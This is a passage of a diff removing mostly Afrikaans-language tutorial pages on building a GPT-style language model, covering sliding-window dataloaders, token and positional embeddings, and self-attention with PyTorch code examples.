url = ("https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt")
|
|
||||||
file_path = "the-verdict.txt"
|
|
||||||
urllib.request.urlretrieve(url, file_path)
|
|
||||||
|
|
||||||
with open("the-verdict.txt", "r", encoding="utf-8") as f:
|
|
||||||
raw_text = f.read()
|
|
||||||
|
|
||||||
"""
|
|
||||||
Create a class that will receive some params like tokenizer and text
|
|
||||||
and will prepare the input chunks and the target chunks to prepare
|
|
||||||
the LLM to learn which next token to generate
|
|
||||||
"""
|
|
||||||
import torch
|
|
||||||
from torch.utils.data import Dataset, DataLoader
|
|
||||||
|
|
||||||
class GPTDatasetV1(Dataset):
|
|
||||||
def __init__(self, txt, tokenizer, max_length, stride):
|
|
||||||
self.input_ids = []
|
|
||||||
self.target_ids = []
|
|
||||||
|
|
||||||
# Tokenize the entire text
|
|
||||||
token_ids = tokenizer.encode(txt, allowed_special={"<|endoftext|>"})
|
|
||||||
|
|
||||||
# Use a sliding window to chunk the book into overlapping sequences of max_length
|
|
||||||
for i in range(0, len(token_ids) - max_length, stride):
|
|
||||||
input_chunk = token_ids[i:i + max_length]
|
|
||||||
target_chunk = token_ids[i + 1: i + max_length + 1]
|
|
||||||
self.input_ids.append(torch.tensor(input_chunk))
|
|
||||||
self.target_ids.append(torch.tensor(target_chunk))
|
|
||||||
|
|
||||||
def __len__(self):
|
|
||||||
return len(self.input_ids)
|
|
||||||
|
|
||||||
def __getitem__(self, idx):
|
|
||||||
return self.input_ids[idx], self.target_ids[idx]
|
|
||||||
|
|
||||||
|
|
||||||
"""
|
|
||||||
Create a data loader which given the text and some params will
|
|
||||||
prepare the inputs and targets with the previous class and
|
|
||||||
then create a torch DataLoader with the info
|
|
||||||
"""
|
|
||||||
|
|
||||||
import tiktoken
|
|
||||||
|
|
||||||
def create_dataloader_v1(txt, batch_size=4, max_length=256,
|
|
||||||
stride=128, shuffle=True, drop_last=True,
|
|
||||||
num_workers=0):
|
|
||||||
|
|
||||||
# Initialize the tokenizer
|
|
||||||
tokenizer = tiktoken.get_encoding("gpt2")
|
|
||||||
|
|
||||||
# Create dataset
|
|
||||||
dataset = GPTDatasetV1(txt, tokenizer, max_length, stride)
|
|
||||||
|
|
||||||
# Create dataloader
|
|
||||||
dataloader = DataLoader(
|
|
||||||
dataset,
|
|
||||||
batch_size=batch_size,
|
|
||||||
shuffle=shuffle,
|
|
||||||
drop_last=drop_last,
|
|
||||||
num_workers=num_workers
|
|
||||||
)
|
|
||||||
|
|
||||||
return dataloader
|
|
||||||
|
|
||||||
|
|
||||||
"""
|
|
||||||
Finally, create the data loader with the params we want:
|
|
||||||
- The used text for training
|
|
||||||
- batch_size: The size of each batch
|
|
||||||
- max_length: The size of each entry on each batch
|
|
||||||
- stride: The sliding window (how many tokens the next entry should advance compared to the previous one). The smaller it is, the more overlap (and potential overfitting); usually this is equal to max_length so the same tokens aren't repeated.
|
|
||||||
- shuffle: Re-order randomly
|
|
||||||
"""
|
|
||||||
dataloader = create_dataloader_v1(
|
|
||||||
raw_text, batch_size=8, max_length=4, stride=1, shuffle=False
|
|
||||||
)
|
|
||||||
|
|
||||||
data_iter = iter(dataloader)
|
|
||||||
first_batch = next(data_iter)
|
|
||||||
print(first_batch)
|
|
||||||
|
|
||||||
# Note the batch_size of 8, the max_length of 4 and the stride of 1
|
|
||||||
[
|
|
||||||
# Input
|
|
||||||
tensor([[ 40, 367, 2885, 1464],
|
|
||||||
[ 367, 2885, 1464, 1807],
|
|
||||||
[ 2885, 1464, 1807, 3619],
|
|
||||||
[ 1464, 1807, 3619, 402],
|
|
||||||
[ 1807, 3619, 402, 271],
|
|
||||||
[ 3619, 402, 271, 10899],
|
|
||||||
[ 402, 271, 10899, 2138],
|
|
||||||
[ 271, 10899, 2138, 257]]),
|
|
||||||
# Target
|
|
||||||
tensor([[ 367, 2885, 1464, 1807],
|
|
||||||
[ 2885, 1464, 1807, 3619],
|
|
||||||
[ 1464, 1807, 3619, 402],
|
|
||||||
[ 1807, 3619, 402, 271],
|
|
||||||
[ 3619, 402, 271, 10899],
|
|
||||||
[ 402, 271, 10899, 2138],
|
|
||||||
[ 271, 10899, 2138, 257],
|
|
||||||
[10899, 2138, 257, 7026]])
|
|
||||||
]
|
|
||||||
|
|
||||||
# With stride=4 this will be the result:
|
|
||||||
[
|
|
||||||
# Input
|
|
||||||
tensor([[ 40, 367, 2885, 1464],
|
|
||||||
[ 1807, 3619, 402, 271],
|
|
||||||
[10899, 2138, 257, 7026],
|
|
||||||
[15632, 438, 2016, 257],
|
|
||||||
[ 922, 5891, 1576, 438],
|
|
||||||
[ 568, 340, 373, 645],
|
|
||||||
[ 1049, 5975, 284, 502],
|
|
||||||
[ 284, 3285, 326, 11]]),
|
|
||||||
# Target
|
|
||||||
tensor([[ 367, 2885, 1464, 1807],
|
|
||||||
[ 3619, 402, 271, 10899],
|
|
||||||
[ 2138, 257, 7026, 15632],
|
|
||||||
[ 438, 2016, 257, 922],
|
|
||||||
[ 5891, 1576, 438, 568],
|
|
||||||
[ 340, 373, 645, 1049],
|
|
||||||
[ 5975, 284, 502, 284],
|
|
||||||
[ 3285, 326, 11, 287]])
|
|
||||||
]
|
|
||||||
```
|
|
||||||
|
|
||||||
## References
|
|
||||||
|
|
||||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
|
||||||
|
|
@ -1,203 +0,0 @@
|
|||||||
# 3. Token Embeddings
|
|
||||||
|
|
||||||
## Token Embeddings
|
|
||||||
|
|
||||||
Na die tokenisering van teksdata, is die volgende kritieke stap in die voorbereiding van data vir die opleiding van groot taalmodelle (LLMs) soos GPT die skep van **token embeddings**. Token embeddings transformeer diskrete tokens (soos woorde of subwoorde) in deurlopende numeriese vektore wat die model kan verwerk en daaruit kan leer. Hierdie verduideliking breek token embeddings, hul inisialisering, gebruik, en die rol van posisionele embeddings in die verbetering van die model se begrip van tokenreekse af.
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Die doel van hierdie derde fase is baie eenvoudig: **Ken elkeen van die vorige tokens in die woordeskat 'n vektor van die verlangde dimensies toe om die model op te lei.** Elke woord in die woordeskat sal 'n punt in 'n ruimte van X dimensies wees.\
|
|
||||||
> Let daarop dat die posisie van elke woord in die ruimte aanvanklik net "random" geinisialiseer word en hierdie posisies is opleibare parameters (sal verbeter word tydens die opleiding).
|
|
||||||
>
|
|
||||||
> Boonop, tydens die token embedding **word 'n ander laag van embeddings geskep** wat (in hierdie geval) die **absolute posisie van die woord in die opleidingssin** verteenwoordig. Op hierdie manier sal 'n woord in verskillende posisies in die sin 'n ander voorstelling (betekenis) hê.
|
|
||||||
|
|
||||||
### **What Are Token Embeddings?**
|
|
||||||
|
|
||||||
**Token Embeddings** is numeriese verteenwoordigings van tokens in 'n deurlopende vektorruimte. Elke token in die woordeskat is geassosieer met 'n unieke vektor van vaste dimensies. Hierdie vektore vang semantiese en sintaktiese inligting oor die tokens vas, wat die model in staat stel om verhoudings en patrone in die data te verstaan.
|
|
||||||
|
|
||||||
- **Vocabulary Size:** Die totale aantal unieke tokens (bv. woorde, subwoorde) in die model se woordeskat.
|
|
||||||
- **Embedding Dimensions:** Die aantal numeriese waardes (dimensies) in elke token se vektor. Hoër dimensies kan meer genuanseerde inligting vasvang, maar vereis meer rekenaarhulpbronne.
|
|
||||||
|
|
||||||
**Example:**
|
|
||||||
|
|
||||||
- **Vocabulary Size:** 6 tokens \[1, 2, 3, 4, 5, 6]
|
|
||||||
- **Embedding Dimensions:** 3 (x, y, z)
|
|
||||||
|
|
||||||
### **Initializing Token Embeddings**
|
|
||||||
|
|
||||||
Aan die begin van die opleiding, word token embeddings tipies met klein random waardes geinisialiseer. Hierdie aanvanklike waardes word aangepas (fyngestem) tydens opleiding om die tokens se betekenisse beter te verteenwoordig op grond van die opleidingsdata.
|
|
||||||
|
|
||||||
**PyTorch Example:**
|
|
||||||
```python
|
|
||||||
import torch
|
|
||||||
|
|
||||||
# Set a random seed for reproducibility
|
|
||||||
torch.manual_seed(123)
|
|
||||||
|
|
||||||
# Create an embedding layer with 6 tokens and 3 dimensions
|
|
||||||
embedding_layer = torch.nn.Embedding(6, 3)
|
|
||||||
|
|
||||||
# Display the initial weights (embeddings)
|
|
||||||
print(embedding_layer.weight)
|
|
||||||
```
|
|
||||||
**Uitset:**
|
|
||||||
```
|
|
||||||
Parameter containing:
|
|
||||||
tensor([[ 0.3374, -0.1778, -0.1690],
|
|
||||||
[ 0.9178, 1.5810, 1.3010],
|
|
||||||
[ 1.2753, -0.2010, -0.1606],
|
|
||||||
[-0.4015, 0.9666, -1.1481],
|
|
||||||
[-1.1589, 0.3255, -0.6315],
|
|
||||||
[-2.8400, -0.7849, -1.4096]], requires_grad=True)
|
|
||||||
```
|
|
||||||
**Verklaring:**
|
|
||||||
|
|
||||||
- Elke ry kom ooreen met 'n token in die woordeskat.
|
|
||||||
- Elke kolom verteenwoordig 'n dimensie in die inbedingsvektor.
|
|
||||||
- Byvoorbeeld, die token op indeks `3` het 'n inbedingsvektor `[-0.4015, 0.9666, -1.1481]`.
|
|
||||||
|
|
||||||
**Toegang tot 'n Token se Inbeding:**
|
|
||||||
```python
|
|
||||||
# Retrieve the embedding for the token at index 3
|
|
||||||
token_index = torch.tensor([3])
|
|
||||||
print(embedding_layer(token_index))
|
|
||||||
```
|
|
||||||
**Uitset:**
|
|
||||||
```lua
|
|
||||||
tensor([[-0.4015, 0.9666, -1.1481]], grad_fn=<EmbeddingBackward0>)
|
|
||||||
```
|
|
||||||
**Interpretasie:**
|
|
||||||
|
|
||||||
- Die token by indeks `3` word verteenwoordig deur die vektor `[-0.4015, 0.9666, -1.1481]`.
|
|
||||||
- Hierdie waardes is opleidingsparameters wat die model tydens opleiding sal aanpas om die token se konteks en betekenis beter te verteenwoordig.
|
|
||||||
|
|
||||||
### **Hoe Token Embeddings Werk Tydens Opleiding**
|
|
||||||
|
|
||||||
Tydens opleiding word elke token in die invoerdata omgeskakel na sy ooreenstemmende embedding vektor. Hierdie vektore word dan in verskeie berekeninge binne die model gebruik, soos aandagmeganismes en neurale netwerklae.
|
|
||||||
|
|
||||||
**Voorbeeld Scenario:**
|
|
||||||
|
|
||||||
- **Batch Grootte:** 8 (aantal monsters wat gelyktydig verwerk word)
|
|
||||||
- **Max Volgorde Lengte:** 4 (aantal tokens per monster)
|
|
||||||
- **Embedding Dimensies:** 256
|
|
||||||
|
|
||||||
**Data Struktuur:**
|
|
||||||
|
|
||||||
- Elke batch word verteenwoordig as 'n 3D tensor met die vorm `(batch_size, max_length, embedding_dim)`.
|
|
||||||
- Vir ons voorbeeld sou die vorm wees `(8, 4, 256)`.
|
|
||||||
|
|
||||||
**Visualisering:**
|
|
||||||
```
|
|
||||||
Batch
|
|
||||||
┌─────────────┐
|
|
||||||
│ Sample 1 │
|
|
||||||
│ ┌─────┐ │
|
|
||||||
│ │Token│ → [x₁₁, x₁₂, ..., x₁₂₅₆]
|
|
||||||
│ │ 1 │ │
|
|
||||||
│ │... │ │
|
|
||||||
│ │Token│ │
|
|
||||||
│ │ 4 │ │
|
|
||||||
│ └─────┘ │
|
|
||||||
│ Sample 2 │
|
|
||||||
│ ┌─────┐ │
|
|
||||||
│ │Token│ → [x₂₁, x₂₂, ..., x₂₂₅₆]
|
|
||||||
│ │ 1 │ │
|
|
||||||
│ │... │ │
|
|
||||||
│ │Token│ │
|
|
||||||
│ │ 4 │ │
|
|
||||||
│ └─────┘ │
|
|
||||||
│ ... │
|
|
||||||
│ Sample 8 │
|
|
||||||
│ ┌─────┐ │
|
|
||||||
│ │Token│ → [x₈₁, x₈₂, ..., x₈₂₅₆]
|
|
||||||
│ │ 1 │ │
|
|
||||||
│ │... │ │
|
|
||||||
│ │Token│ │
|
|
||||||
│ │ 4 │ │
|
|
||||||
│ └─────┘ │
|
|
||||||
└─────────────┘
|
|
||||||
```
|
|
||||||
**Verklaring:**
|
|
||||||
|
|
||||||
- Elke token in die reeks word verteenwoordig deur 'n 256-dimensionele vektor.
|
|
||||||
- Die model verwerk hierdie embeddings om taalpatrone te leer en voorspellings te genereer.
|
|
||||||
|
|
||||||
## **Posisionele Embeddings: Voeg Konteks by Token Embeddings**
|
|
||||||
|
|
||||||
Terwyl token embeddings die betekenis van individuele tokens vasvang, kodeer hulle nie inherent die posisie van tokens binne 'n reeks nie. Om die volgorde van tokens te verstaan, is noodsaaklik vir taalbegrip. Dit is waar **posisionele embeddings** in die prentjie kom.
|
|
||||||
|
|
||||||
### **Waarom Posisionele Embeddings Benodig Word:**
|
|
||||||
|
|
||||||
- **Token Volgorde Maak Saak:** In sinne hang die betekenis dikwels af van die volgorde van woorde. Byvoorbeeld, "Die kat het op die mat gesit" teenoor "Die mat het op die kat gesit."
|
|
||||||
- **Embedding Beperking:** Sonder posisionele inligting behandel die model tokens as 'n "sak van woorde," terwyl hulle hul volgorde ignoreer.
|
|
||||||
|
|
||||||
### **Tipes van Posisionele Embeddings:**
|
|
||||||
|
|
||||||
1. **Absoluut Posisionele Embeddings:**
|
|
||||||
- Ken 'n unieke posisie vektor aan elke posisie in die reeks toe.
|
|
||||||
- **Voorbeeld:** Die eerste token in enige reeks het dieselfde posisionele embedding, die tweede token het 'n ander, en so aan.
|
|
||||||
- **Gebruik Deur:** OpenAI se GPT-modelle.
|
|
||||||
2. **Relatiewe Posisionele Embeddings:**
|
|
||||||
- Kodeer die relatiewe afstand tussen tokens eerder as hul absolute posisies.
|
|
||||||
- **Voorbeeld:** Dui aan hoe ver twee tokens van mekaar af is, ongeag hul absolute posisies in die reeks.
|
|
||||||
- **Gebruik Deur:** Modelle soos Transformer-XL en sommige variasies van BERT.
|
|
||||||
|
|
||||||
### **Hoe Posisionele Embeddings Geïntegreer Word:**
|
|
||||||
|
|
||||||
- **Dieselfde Dimensies:** Posisionele embeddings het dieselfde dimensionaliteit as token embeddings.
|
|
||||||
- **Byvoeging:** Hulle word by token embeddings gevoeg, wat token identiteit kombineer met posisionele inligting sonder om die algehele dimensionaliteit te verhoog.
|
|
||||||
|
|
||||||
**Voorbeeld van Byvoeging van Posisionele Embeddings:**
|
|
||||||
|
|
||||||
Neem aan 'n token embedding vektor is `[0.5, -0.2, 0.1]` en sy posisionele embedding vektor is `[0.1, 0.3, -0.1]`. Die gekombineerde embedding wat deur die model gebruik word, sou wees:
|
|
||||||
```
|
|
||||||
Combined Embedding = Token Embedding + Positional Embedding
|
|
||||||
= [0.5 + 0.1, -0.2 + 0.3, 0.1 + (-0.1)]
|
|
||||||
= [0.6, 0.1, 0.0]
|
|
||||||
```
|
|
||||||
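The same addition, as a tiny PyTorch sketch:
```python
import torch

token_emb = torch.tensor([0.5, -0.2, 0.1])
pos_emb   = torch.tensor([0.1,  0.3, -0.1])

combined = token_emb + pos_emb   # element-wise addition, dimensionality unchanged
print(combined)                  # tensor([0.6000, 0.1000, 0.0000])
```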
**Voordele van Posisionele Embeddings:**
|
|
||||||
|
|
||||||
- **Kontextuele Bewustheid:** Die model kan tussen tokens onderskei op grond van hul posisies.
|
|
||||||
- **Volgorde Begrip:** Stel die model in staat om grammatika, sintaksis en kontekstafhanklike betekenisse te verstaan.
|
|
||||||
|
|
||||||
## Kode Voorbeeld
|
|
||||||
|
|
||||||
Volg met die kode voorbeeld van [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb):
|
|
||||||
```python
|
|
||||||
# Use previous code...
|
|
||||||
|
|
||||||
# Create dimensional embeddings
|
|
||||||
"""
|
|
||||||
BPE uses a vocabulary of 50257 words
|
|
||||||
Let's suppose we want to use 256 dimensions (instead of the thousands used by real LLMs)
|
|
||||||
"""
|
|
||||||
|
|
||||||
vocab_size = 50257
|
|
||||||
output_dim = 256
|
|
||||||
token_embedding_layer = torch.nn.Embedding(vocab_size, output_dim)
|
|
||||||
|
|
||||||
## Generate the dataloader like before
|
|
||||||
max_length = 4
|
|
||||||
dataloader = create_dataloader_v1(
|
|
||||||
raw_text, batch_size=8, max_length=max_length,
|
|
||||||
stride=max_length, shuffle=False
|
|
||||||
)
|
|
||||||
data_iter = iter(dataloader)
|
|
||||||
inputs, targets = next(data_iter)
|
|
||||||
|
|
||||||
# Apply embeddings
|
|
||||||
token_embeddings = token_embedding_layer(inputs)
|
|
||||||
print(token_embeddings.shape)
|
|
||||||
torch.Size([8, 4, 256]) # 8 x 4 x 256
|
|
||||||
|
|
||||||
# Generate absolute embeddings
|
|
||||||
context_length = max_length
|
|
||||||
pos_embedding_layer = torch.nn.Embedding(context_length, output_dim)
|
|
||||||
|
|
||||||
pos_embeddings = pos_embedding_layer(torch.arange(max_length))
|
|
||||||
|
|
||||||
input_embeddings = token_embeddings + pos_embeddings
|
|
||||||
print(input_embeddings.shape) # torch.Size([8, 4, 256])
|
|
||||||
```
|
|
||||||
## Verwysings
|
|
||||||
|
|
||||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
|
@ -1,418 +0,0 @@
|
|||||||
# 4. Aandag Meganismes
|
|
||||||
|
|
||||||
## Aandag Meganismes en Self-Aandag in Neurale Netwerke
|
|
||||||
|
|
||||||
Aandag meganismes laat neurale netwerke toe om **op spesifieke dele van die invoer te fokus wanneer hulle elke deel van die uitvoer genereer**. Hulle ken verskillende gewigte aan verskillende invoere toe, wat die model help om te besluit watter invoere die mees relevant is vir die taak wat voorlê. Dit is van kardinale belang in take soos masjienvertaling, waar die begrip van die konteks van die hele sin noodsaaklik is vir akkurate vertaling.
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Die doel van hierdie vierde fase is baie eenvoudig: **Pas 'n paar aandag meganismes toe**. Hierdie gaan baie **herhaalde lae** wees wat die **verhouding van 'n woord in die woordeskat met sy bure in die huidige sin wat gebruik word om die LLM te train, vasvang**.\
|
|
||||||
> 'n Groot aantal lae word hiervoor gebruik, so 'n groot aantal leerbare parameters gaan hierdie inligting vasvang.
|
|
||||||
|
|
||||||
### Verstaan Aandag Meganismes
|
|
||||||
|
|
||||||
In tradisionele volgorde-tot-volgorde modelle wat vir taalvertaling gebruik word, kodeer die model 'n invoer volgorde in 'n vaste-grootte konteksvektor. Hierdie benadering sukkel egter met lang sinne omdat die vaste-grootte konteksvektor dalk nie al die nodige inligting vasvang nie. Aandag meganismes spreek hierdie beperking aan deur die model toe te laat om al die invoer tokens in ag te neem wanneer dit elke uitvoer token genereer.
|
|
||||||
|
|
||||||
#### Voorbeeld: Masjienvertaling
|
|
||||||
|
|
||||||
Oorweeg om die Duitse sin "Kannst du mir helfen diesen Satz zu übersetzen" in Engels te vertaal. 'n Woord-vir-woord vertaling sou nie 'n grammatikaal korrekte Engelse sin lewer nie weens verskille in grammatikaal strukture tussen tale. 'n Aandag meganisme stel die model in staat om op relevante dele van die invoer sin te fokus wanneer dit elke woord van die uitvoer sin genereer, wat lei tot 'n meer akkurate en samehangende vertaling.
|
|
||||||
|
|
||||||
### Inleiding tot Self-Aandag
|
|
||||||
|
|
||||||
Self-aandag, of intra-aandag, is 'n meganisme waar aandag binne 'n enkele volgorde toegepas word om 'n voorstelling van daardie volgorde te bereken. Dit laat elke token in die volgorde toe om op al die ander tokens te let, wat die model help om afhanklikhede tussen tokens vas te vang ongeag hul afstand in die volgorde.
|
|
||||||
|
|
||||||
#### Sleutelkonsepte
|
|
||||||
|
|
||||||
- **Tokens**: Individuele elemente van die invoer volgorde (bv. woorde in 'n sin).
|
|
||||||
- **Embeddings**: Vektor voorstellings van tokens, wat semantiese inligting vasvang.
|
|
||||||
- **Aandag Gewigte**: Waardes wat die belangrikheid van elke token relatief tot ander bepaal.
|
|
||||||
|
|
||||||
### Berekening van Aandag Gewigte: 'n Stap-vir-Stap Voorbeeld
|
|
||||||
|
|
||||||
Kom ons oorweeg die sin **"Hello shiny sun!"** en verteenwoordig elke woord met 'n 3-dimensionele embedding:
|
|
||||||
|
|
||||||
- **Hello**: `[0.34, 0.22, 0.54]`
|
|
||||||
- **shiny**: `[0.53, 0.34, 0.98]`
|
|
||||||
- **sun**: `[0.29, 0.54, 0.93]`
|
|
||||||
|
|
||||||
Ons doel is om die **konteksvektor** vir die woord **"shiny"** te bereken met behulp van self-aandag.
|
|
||||||
|
|
||||||
#### Stap 1: Bereken Aandag Punte
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Don't get lost in the mathematical terms; the goal of this step is simple: the dot product between two embeddings measures how similar (aligned) they are, so a higher score means that word is more relevant to the query word.
|
|
||||||
Vir elke woord in die sin, bereken die **aandag punt** ten opsigte van "shiny" deur die dot produk van hul embeddings te bereken.
|
|
||||||
|
|
||||||
**Aandag Punt tussen "Hello" en "shiny"**
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (4) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
**Aandag Punt tussen "shiny" en "shiny"**
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
**Aandag Punt tussen "sun" en "shiny"**
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (2) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
#### Stap 2: Normaliseer Aandag Punte om Aandag Gewigte te Verkry
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Moet nie in die wiskundige terme verlore gaan nie, die doel van hierdie funksie is eenvoudig, normaliseer al die gewigte sodat **hulle in totaal 1 optel**.
|
|
||||||
>
|
|
||||||
> Boonop, **softmax** funksie word gebruik omdat dit verskille beklemtoon as gevolg van die eksponensiële deel, wat dit makliker maak om nuttige waardes te identifiseer.
|
|
||||||
|
|
||||||
Pas die **softmax funksie** toe op die aandag punte om hulle in aandag gewigte te omskep wat tot 1 optel.
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (3) (1) (1) (1) (1).png" alt="" width="293"><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
Berekening van die eksponensiale:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (4) (1) (1) (1).png" alt="" width="249"><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
Berekening van die som:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (5) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
Berekening van aandag gewigte:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (6) (1) (1).png" alt="" width="404"><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
#### Stap 3: Bereken die Konteksvektor
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Kry net elke aandag gewig en vermenigvuldig dit met die verwante token dimensies en som dan al die dimensies om net 1 vektor (die konteksvektor) te kry.
|
|
||||||
|
|
||||||
Die **konteksvektor** word bereken as die gewigte som van die embeddings van al die woorde, met behulp van die aandag gewigte.
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (16).png" alt="" width="369"><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
Berekening van elke komponent:
|
|
||||||
|
|
||||||
- **Gewigte Embedding van "Hello"**:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (7) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
- **Gewigte Embedding van "shiny"**:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (8) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
- **Gewigte Embedding van "sun"**:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (9) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
Som die gewigte embeddings:
|
|
||||||
|
|
||||||
`konteksvektor=[0.0779+0.2156+0.1057, 0.0504+0.1382+0.1972, 0.1237+0.3983+0.3390]=[0.3992,0.3858,0.8610]`
|
|
||||||
|
|
||||||
**Hierdie konteksvektor verteenwoordig die verrykte embedding vir die woord "shiny," wat inligting van al die woorde in die sin inkorporeer.**
|
|
||||||
|
|
||||||
### Samevatting van die Proses
|
|
||||||
|
|
||||||
1. **Bereken Aandag Punte**: Gebruik die dot produk tussen die embedding van die teikenwoord en die embeddings van al die woorde in die volgorde.
|
|
||||||
2. **Normaliseer Punte om Aandag Gewigte te Verkry**: Pas die softmax funksie toe op die aandag punte om gewigte te verkry wat tot 1 optel.
|
|
||||||
3. **Bereken Konteksvektor**: Vermenigvuldig elke woord se embedding met sy aandag gewig en som die resultate.
|
|
||||||
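
The following minimal PyTorch sketch (my own illustration, not taken from the referenced notebook) reproduces the three steps above using the example embeddings; the printed values match the hand-computed ones up to rounding.

```python
import torch

# Example 3-dimensional embeddings for "Hello shiny sun!"
inputs = torch.tensor([
    [0.34, 0.22, 0.54],  # Hello
    [0.53, 0.34, 0.98],  # shiny
    [0.29, 0.54, 0.93],  # sun
])

query = inputs[1]                     # embedding of "shiny"

# Step 1: attention scores = dot product of the query with every embedding
attn_scores = inputs @ query          # shape: (3,)

# Step 2: softmax turns the scores into weights that sum to 1
attn_weights = torch.softmax(attn_scores, dim=0)

# Step 3: context vector = weighted sum of all embeddings
context_vec = attn_weights @ inputs   # shape: (3,)

print(attn_weights)   # weights for Hello, shiny, sun
print(context_vec)    # enriched representation of "shiny", ≈ [0.3992, 0.3858, 0.8610]
```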

## Self-Attention with Trainable Weights

In practice, self-attention mechanisms use **trainable weights** to learn the best representations for queries, keys, and values. This involves introducing three weight matrices:

<figure><img src="../../images/image (10) (1) (1).png" alt="" width="239"><figcaption></figcaption></figure>

The query is computed from the input data as before, while the key and value matrices are simply randomly initialized, trainable matrices.

#### Step 1: Compute Queries, Keys, and Values

Each token gets its own query, key, and value vector by multiplying its embedding values with the defined matrices:

<figure><img src="../../images/image (11).png" alt="" width="253"><figcaption></figcaption></figure>

These matrices transform the original embeddings into a new space suitable for computing attention.

**Example**

Assuming:

- Input dimension `din=3` (embedding size)
- Output dimension `dout=2` (desired dimension for queries, keys, and values)

Initialize the weight matrices:
```python
import torch
import torch.nn as nn

d_in = 3
d_out = 2

W_query = nn.Parameter(torch.rand(d_in, d_out))
W_key = nn.Parameter(torch.rand(d_in, d_out))
W_value = nn.Parameter(torch.rand(d_in, d_out))
```
Compute the queries, keys, and values:
```python
# `inputs` is the (num_tokens, d_in) embedding matrix, e.g. the tensor defined in the next example
queries = torch.matmul(inputs, W_query)
keys = torch.matmul(inputs, W_key)
values = torch.matmul(inputs, W_value)
```
#### Step 2: Compute Scaled Dot-Product Attention

**Compute Attention Scores**

As in the previous example, but this time, instead of using the raw embedding values of the tokens, we use each token's key vector (which was already computed from those embeddings). So, for each query `qi` and key `kj`:

<figure><img src="../../images/image (12).png" alt=""><figcaption></figcaption></figure>

**Scale the Scores**

To prevent the dot products from becoming too large, scale them by the square root of the key dimension `dk`:

<figure><img src="../../images/image (13).png" alt="" width="295"><figcaption></figcaption></figure>

> [!TIP]
> The score is divided by the square root of the dimension because dot products can become very large and this helps to regulate them.

**Apply Softmax to Obtain Attention Weights:** As in the initial example, normalize all the values so they sum to 1.

<figure><img src="../../images/image (14).png" alt="" width="295"><figcaption></figcaption></figure>

#### Step 3: Compute Context Vectors

As in the initial example, just sum all the value vectors, multiplying each by its attention weight:

<figure><img src="../../images/image (15).png" alt="" width="328"><figcaption></figcaption></figure>

### Code Example

Grabbing an example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb), you can check this class that implements the self-attention functionality we discussed:
```python
import torch
import torch.nn as nn

inputs = torch.tensor(
  [[0.43, 0.15, 0.89], # Your     (x^1)
   [0.55, 0.87, 0.66], # journey  (x^2)
   [0.57, 0.85, 0.64], # starts   (x^3)
   [0.22, 0.58, 0.33], # with     (x^4)
   [0.77, 0.25, 0.10], # one      (x^5)
   [0.05, 0.80, 0.55]] # step     (x^6)
)

class SelfAttention_v2(nn.Module):

    def __init__(self, d_in, d_out, qkv_bias=False):
        super().__init__()
        self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)

    def forward(self, x):
        keys = self.W_key(x)
        queries = self.W_query(x)
        values = self.W_value(x)

        attn_scores = queries @ keys.T
        attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)

        context_vec = attn_weights @ values
        return context_vec

d_in = 3
d_out = 2
torch.manual_seed(789)
sa_v2 = SelfAttention_v2(d_in, d_out)
print(sa_v2(inputs))
```
> [!NOTE]
> Note that instead of initializing the matrices with random values, `nn.Linear` is used so that all the weights are registered as parameters to train.

## Causal Attention: Hiding Future Words

For LLMs we want the model to consider only the tokens that appear before the current position in order to **predict the next token**. **Causal attention**, also known as **masked attention**, achieves this by modifying the attention mechanism to prevent access to future tokens.

### Applying a Causal Attention Mask

To implement causal attention, we apply a mask to the attention scores **before the softmax operation** so that the remaining scores still sum to 1. This mask sets the attention scores of future tokens to negative infinity, which ensures that after the softmax their attention weights are zero.

**Steps**

1. **Compute Attention Scores**: Same as before.
2. **Apply the Mask**: Use an upper-triangular matrix filled with negative infinity above the diagonal.

```python
# -inf above the diagonal, 0 on and below it
mask = torch.triu(torch.full((seq_len, seq_len), float("-inf")), diagonal=1)
masked_scores = attention_scores + mask
```

